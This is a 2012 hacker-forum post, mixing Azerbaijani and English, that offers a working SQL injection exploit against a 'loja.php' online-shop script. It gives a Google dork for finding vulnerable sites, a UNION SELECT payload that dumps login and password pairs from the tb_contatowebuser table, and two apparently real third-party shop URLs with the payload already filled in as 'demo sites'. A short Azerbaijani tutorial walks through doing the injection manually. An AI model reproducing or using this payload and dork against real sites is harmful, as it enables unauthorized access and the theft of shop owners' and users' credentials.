Source & Exploit [+] Losa SQL Inject

Video :
http://www.youtube.com/watch?v=zXmNrTOeNrU&feature=youtu.be

Source:
#################################################################
# In The Name Of ALLAH
# Date : 2012-04-09
# Author : Avatar [Fearless]
# Subject : Loja SQL Inject Exploit
# Software : Anti-armenia.ORG // Pirates-Crew.ORG // Mexfi.ORG // Pwn.Me :D
# Team`Z : AA Team // PC Team // MF Team // PWN Team :D // The Fear // UG Team
# Greet'Z To : All Member'Z of the Team'Z
# Respect To : All My Bro'Z
# Language : Azerbaijani/English
# Localation : Sweden/Sundsvall
# Dork : inurl:"/loja.php?idCategoria="
# Exploit : union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--
#################################################################
Let'Z Start :
Salamlar... Bu Gun ki, Movzumda sizlere Loja SQL Inject Exploit-in gostereciyem elimizdekilere 1 baxaq
^
|
Yazdigim dork + Exploit[qeyd etdiyim] onlar ishe yarayir yani dork-la tapdigimiz saytlarin ekseriyyetinde hemin exploit ishleyir burdada exploit hakkinda
melumat tapa bilersiniz [new6]
Ve demeli ishe qoyular... Bunlar tekrar baxdiqlarim suphesini oyandirdisa deye mende cookies-leri temizlemeden 5-6 sehifeye kecdim ilk once exploit-den
istifade edek sonra ozumuz manual yolla edek sizede aydin olar... burda ishlemedi... Bezen-de hayalkirikligi :D ok indide manual yolu yoxlayaq
indi elimizdekileri deyerlendirek columnlara kecek
# Table Name : tb_contatowebuser , tb_admin
# Column Name : login,passwd
indide exploitimizi hazirlayaq :D  onda o biri tableye baxaq
ve buda bizim pass+email[namideger login]-lerimiz indide bashqa cur baxaq USER ile
demekki user columns-u bashqa tableye aidmish yada user tabledir :D indi 1 daha baxaq belede 1 deyishiklik yoxdu yani hazir bu gunluk bu qeder exploit
uzre dersliyimizide hazirladiq nese sualiniz olsa buyurun Saygilarimla : Avatar [Fearless] :)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
########################################################################################################################
# Exploit Title : Loja SQL Inject
# Author : Baton2303 & Avatar [Fearless]
# Date : 2012-04-29
# Tested On : Windows 7 [Ultimate x86] / Linux
# Localation : Sweden/Sundsvall ~~--~~ Azerbaijan/Baku
# Language : English/Azerbaijani Language/
# Software : http://thefear.in/loja.txt
# Official : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D // Mexfi.ORG
# Team'Z : AA Team // PC Team // MF Team // PWN Team :D //
# Greet`Z To : All Member'Z Of The Team'Z
########################################################################################################################
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
[-] How to :
Dork : {inurl:"/loja.php?idCategoria="}

[+] Exploit :
http://localhost.com/loja.php?idCategoria=-1 union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--
[union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--]

[/?\] Demo Site's :
http://www.paulobarsano.com/lojavirtual/loja.php?idCategoria=-1%20union%20all%20select%201,2,3,4,5,group_concat%28login,0x3a,passwd%29,7,8,9,10,11,12,13%20from%20tb_contatowebuser--
http://yrev.com.br/lojavirtual/loja.php?idCategoria=-47%20union%20all%20select%201,2,3,4,5,group_concat%28login,0x3a,passwd%29,7,8,9,10,11,12,13%20from%20tb_contatowebuser--

[<?>] Contact:
[Mail>] : ~~avatar@hiphopfan.com~~ [A.k.A Avatar~Fearless]
[Mail>] : ~~jey09@list.ru~~ [A.k.A Baton2303]

Video : http://youtu.be/zXmNrTOeNrU
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_